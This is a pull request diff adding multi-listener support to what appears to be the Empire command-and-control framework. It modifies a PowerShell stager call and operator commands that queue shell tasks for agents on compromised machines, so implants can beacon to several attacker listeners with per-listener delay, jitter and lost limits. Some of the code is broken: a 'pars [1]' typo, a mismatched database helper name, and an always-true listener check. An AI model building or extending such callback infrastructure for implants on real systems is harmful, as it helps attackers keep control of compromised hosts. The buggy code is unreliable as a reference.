### PR TITLE
Multi listener support

### DIFF
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -236,7 +236,7 @@ function Start-Negotiate {
     [GC]::Collect();
 
     # TODO: remove this shitty $server logic
-    Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
+    Invoke-Empire -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
 }
 # $ser is the server populated from the launcher code, needed here in order to facilitate hop listeners
 Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u;

--- a/lib/common/empire.py
+++ b/lib/common/empire.py
@@ -1381,23 +1381,24 @@ class AgentsMenu(SubMenu):
 
 
     def do_lostlimit(self, line):
-        "Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '"
+        "Task one or more agents to 'lostlimit [agent/all] listenerName [number of missed callbacks] '"
 
         parts = line.strip().split(' ')
 
         if len(parts) == 1:
-            print helpers.color("[!] Usage: 'lostlimit [agent/all] [number of missed callbacks]")
+            print helpers.color("[!] Usage: 'lostlimit [agent/all] listenername [number of missed callbacks]")
 
         elif parts[0].lower() == 'all':
-            lostLimit = parts[1]
-            allAgents = self.mainMenu.agents.get_agents_db()
+            listenerName = parts[1]
+            lostLimit = parts[2]
+            allAgents = self.mainMenu.agents.get_agents_for_listener(listenerName)
 
             for agent in allAgents:
                 sessionID = agent['session_id']
                 # update this agent info in the database
-                self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
+                self.mainMenu.agents.set_agent_listener_fld_db('lost_limit', lostLimit, sessionID, listenerName)
                 # task the agent
-                self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
+                self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(listenerName) + ' ' + str(lostLimit))
 
                 # dispatch this event
                 message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
@@ -1414,13 +1415,14 @@ class AgentsMenu(SubMenu):
         else:
             # extract the sessionID and clear the agent tasking
             sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
-            lostLimit = parts[1]
+            listenerName = pars [1]
+            lostLimit = parts[2]
 
             if sessionID and len(sessionID) != 0:
                 # update this agent's information in the database
-                self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
+                self.mainMenu.agents.set_agent_listener_fld_db('lost_limit', lostLimit, sessionID,listenerName)
 
-                self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
+                self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(listenerName) + ' ' + str(lostLimit))
 
                 # dispatch this event
                 message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
@@ -1962,21 +1964,22 @@ class PowerShellAgentMenu(SubMenu):
             self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
 
     def do_sleep(self, line):
-        "Task an agent to 'sleep interval [jitter]'"
+        "Task an agent to 'sleep listener interval [jitter]'"
 
         parts = line.strip().split(' ')
 
         if len(parts) > 0 and parts[0] != "":
-            delay = parts[0]
+            listener = parts[0]
+            delay = parts[1]
             jitter = 0.0
-            if len(parts) == 2:
-                jitter = parts[1]
+            if len(parts) == 3:
+                jitter = parts[2]
 
             # update this agent's information in the database
-            self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
-            self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
+            self.mainMenu.agents.set_agent_listener_fld_db("delay", delay, self.sessionID,listener)
+            self.mainMenu.agents.set_agent_listener_db("jitter", jitter, self.sessionID,listener)
 
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-Delay " + str(delay) + ' ' + str(jitter))
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-Delay " + str(listener) + ' ' + str(delay) + ' ' + str(jitter))
 
             # dispatch this event
             message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
@@ -1987,23 +1990,24 @@ class PowerShellAgentMenu(SubMenu):
             dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
 
             # update the agent log
-            msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
+            msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter) + " for listener "+listener
             self.mainMenu.agents.save_agent_log(self.sessionID, msg)
 
 
     def do_lostlimit(self, line):
-        "Task an agent to change the limit on lost agent detection"
+        "Task an agent to change the limit on lost agent detection, syntax: 'lostlimit listener newvalue'"
 
         parts = line.strip().split(' ')
-        if len(parts) > 0 and parts[0] != "":
-            lostLimit = parts[0]
+        if len(parts) > 1 and parts[0] != "":
+            listener = parts[0]
+            lostLimit = parts[1]
 
         # update this agent's information in the database
-        self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
-        self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
+        self.mainMenu.agents.set_agent_listener_fld_db("lost_limit", lostLimit, self.sessionID, listener)
+        self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-LostLimit " + str(listener) +" "+str(lostLimit))
 
         # dispatch this event
-        message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
+        message = "[*] Tasked agent to change lost limit {} for listener {}".format(lostLimit,listener)
         signal = json.dumps({
             'print': False,
             'message': message
@@ -2375,10 +2379,9 @@ class PowerShellAgentMenu(SubMenu):
                 activeListener = self.mainMenu.listeners.activeListeners[listenerID]
                 if activeListener['moduleName'] != 'meterpreter' or activeListener['moduleName'] != 'http_mapi':
                     listenerOptions = activeListener['options']
-                    listenerComms = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_comms(listenerOptions, language="powershell")
+                    listenerComms = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_comms(listenerOptions, language="powershell", deployed = True)
 
                     self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPDATE_LISTENERNAME", listenerOptions['Name']['Value'])
-                    self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SWITCH_LISTENER", listenerComms)
                     
                     msg = "Tasked agent to update comms to %s listener" % listenerID
                     self.mainMenu.agents.save_agent_log(self.sessionID, msg)
@@ -2953,7 +2956,7 @@ class PythonAgentMenu(SubMenu):
 
 
     def do_sleep(self, line):
-        "Task an agent to 'sleep interval [jitter]'"
+        "Task an agent to 'sleep interval [ listenerName jitter]'"
 
         parts = line.strip().split(' ')
         delay = parts[0]
@@ -2975,7 +2978,7 @@ class PythonAgentMenu(SubMenu):
 
         if delay == "":
             # task the agent to display the delay/jitter
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; print 'delay/jitter = ' + str(delay)+'/'+str(jitter)")
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "print_delay_jitter()")
 
             # dispatch this event
             message = "[*] Tasked agent to display delay/jitter"
@@ -2987,17 +2990,16 @@ class PythonAgentMenu(SubMenu):
 
             self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display delay/jitter")
 
-        elif len(parts) > 0 and parts[0] != "":
+        elif len(parts) > 2 and parts[0] != "":
             delay = parts[0]
-            jitter = 0.0
-            if len(parts) == 2:
-                jitter = parts[1]
+            jitter = parts[2]
+            listenerName = parts[1]
 
             # update this agent's information in the database
-            self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
-            self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
+            self.mainMenu.agents.set_agent_listener_fld_db("delay", delay, self.sessionID, listenerName)
+            self.mainMenu.agents.set_agent_listener_fld_db("jitter", jitter, self.sessionID, listenerName)
 
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print 'delay/jitter set to %s/%s'" % (delay, jitter, delay, jitter))
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "set_delay_jitter('{}',{},{})".format(listenerName,delay,jitter))
 
             # dispatch this event
             message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
@@ -3013,14 +3015,14 @@ class PythonAgentMenu(SubMenu):
 
 
     def do_lostlimit(self, line):
-        "Task an agent to display change the limit on lost agent detection"
+        "Task an agent to display change the limit on lost agent detection for listener: lostlimit [listener newvalue]"
 
         parts = line.strip().split(' ')
         lostLimit = parts[0]
 
         if lostLimit == "":
             # task the agent to display the lostLimit
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global lostLimit; print 'lostLimit = ' + str(lostLimit)")
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "print_lost_limits()")
 
             # dispatch this event
             message = "[*] Tasked agent to display lost limit"
@@ -3032,14 +3034,17 @@ class PythonAgentMenu(SubMenu):
 
             self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display lost limit")
         else:
+            listener = parts[0]
+            lostLimit = parts[1]
+
             # update this agent's information in the database
-            self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
+            self.mainMenu.agents.set_agent_listener_fld_db("lost_limit", lostLimit, self.sessionID,listener)
 
             # task the agent with the new lostLimit
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global lostLimit; lostLimit=%s; print 'lostLimit set to %s'"%(lostLimit, lostLimit))
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "set_lost_limit('{}',{})".format(listener,lostLimit))
 
             # dispatch this event
-            message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
+            message = "[*] Tasked agent to change lost limit {} for listener {}".format(lostLimit,listener)
             signal = json.dumps({
                 'print': False,
                 'message': message

--- a/lib/common/messages.py
+++ b/lib/common/messages.py
@@ -177,7 +177,7 @@ def display_agents(agents):
 
         print ''
         print helpers.color("[*] Active agents:\n")
-        print " Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener"
+        print " Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listeners"
         print " ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------"
 
         for agent in agents:
@@ -203,7 +203,7 @@ def display_agents(agents):
                                   '{0: <6}'.format(str(agent['process_id'])),
                                   '{0: <8}'.format(str(agent['delay']) + "/"  +str(agent['jitter'])),
                                   '{0: <31}'.format(str(helpers.lastseen(agent['lastseen_time'], agent['delay'], agent['jitter']))),
-                                  '{0: <16}'.format(str(agent['listener'])))
+                                  '{0: <16}'.format(str(agent['listeners'])))
 
             # Skip rows for better readability
             rowToggle = (rowToggle + 1) % 3

--- a/setup/setup_database.py
+++ b/setup/setup_database.py
@@ -65,6 +65,7 @@ c = conn.cursor()
 
 # try to prevent some of the weird sqlite I/O errors
 c.execute('PRAGMA journal_mode = OFF')
+c.execute('PRAGMA foreign_keys = ON')
 
 c.execute('DROP TABLE IF EXISTS config')
 c.execute('''CREATE TABLE config (
@@ -89,12 +90,9 @@ c.execute("INSERT INTO config VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)", (STAGING_KEY,
 c.execute('''CREATE TABLE "agents" (
     "id" integer PRIMARY KEY,
     "session_id" text,
-    "listener" text,
     "name" text,
     "language" text,
     "language_version" text,
-    "delay" integer,
-    "jitter" real,
     "external_ip" text,
     "internal_ip" text,
     "username" text,
@@ -114,7 +112,6 @@ c.execute('''CREATE TABLE "agents" (
     "functions" text,
     "kill_date" text,
     "working_hours" text,
-    "lost_limit" integer,
     "taskings" text,
     "results" text
     )''')
@@ -129,6 +126,17 @@ c.execute('''CREATE TABLE "listeners" (
     "listener_category" text,
     "enabled" boolean,
     "options" blob
+    )''')
+
+c.execute('''CREATE TABLE "agents_listeners" (
+    "agentID" integer,
+    "listenerID" integer,
+    "lost_limit" integer,
+    "delay" integer,
+    "jitter" integer,
+     FOREIGN KEY(agentID) REFERENCES agents(id) ON DELETE CASCADE,
+     FOREIGN KEY(listenerID) REFERENCES listeners(id) ON DELETE CASCADE,
+     PRIMARY KEY(agentID,listenerID)
     )''')
 
 # type = hash, plaintext, token


### PR DESCRIPTION
See #1241 
This PR contains changes to the following files:
* setup/setup_database.py -> Updates schema to support multiple listeners for all agents
* lib/common/messages.py -> Displays multiple listeners when listing agents
* lib/common/agents.py -> Use the new database schema when adding or removing agents
* data/agent/agent.(ps1|py) -> can call several listeners with different jitter and lostLimits
* lib/listeners/*.py -> adds "SupListeners" menu entry to generate communication code for other listeners